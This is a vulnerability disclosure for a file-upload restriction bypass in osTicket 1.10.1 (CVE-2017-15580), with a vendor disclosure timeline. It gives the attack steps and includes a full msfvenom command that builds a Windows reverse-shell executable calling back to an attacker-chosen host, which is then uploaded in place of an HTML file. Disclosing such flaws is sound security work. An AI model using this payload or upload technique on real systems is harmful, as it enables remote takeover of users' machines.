osTicket 1.10.1 Shell Upload

osTicket version 1.10.1 suffers from a remote shell upload vulnerability.

MD5 | 91d3007b10106697abc4881dc25ab268

Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload-

*# Exploit Title: File Upload Restrictions Bypassed*
*# Date: 18 October, 2017*
*# Exploit Author: Rajwinder Singh*
*# Vendor Homepage: http://osticket.com/ <http://osticket.com/>*
*# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip
*# Version: v1.10.1*
*# CVE : 2017-15580*

Vulnerability Details:
osTicket application provides a functionality to upload 'html' files with
associated formats. However, application does not properly validate the
uploaded fileas contents and thus accepts any type of files.

Uploaded shell to get reverse shell of end user for the demo purpose.

1. Created a valid '.html' file to bypass client-side validations.
<p>test page</p>


2. Created a reverse shell with '.exe' file extension using msfvenom.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR
IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe

3. As shown in the below screenshot, intercepted the request and changed
file extension '.html' to '.exe' and received a valid response from server
along with uploaded malicious file.



4. As shown in the below screenshot, successfully uploaded malicious file
on the server.

Ready to get reverse shell.

*Affected Component:*
*Parameter:* tickets.php?id=<ticket_number>#reply

*Disclosure Timeline:*
Vendor Confirmation: 11 October, 2017
Mitre Notification: 17 October, 2017
Public Disclosure: 18 October, 2017

*Exploitation Technique:*

*Severity Level:*

Request Method(s): [+] POST
Vulnerable Product: [+] osTicket - v1.10.1
Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply

Thank you

Related Posts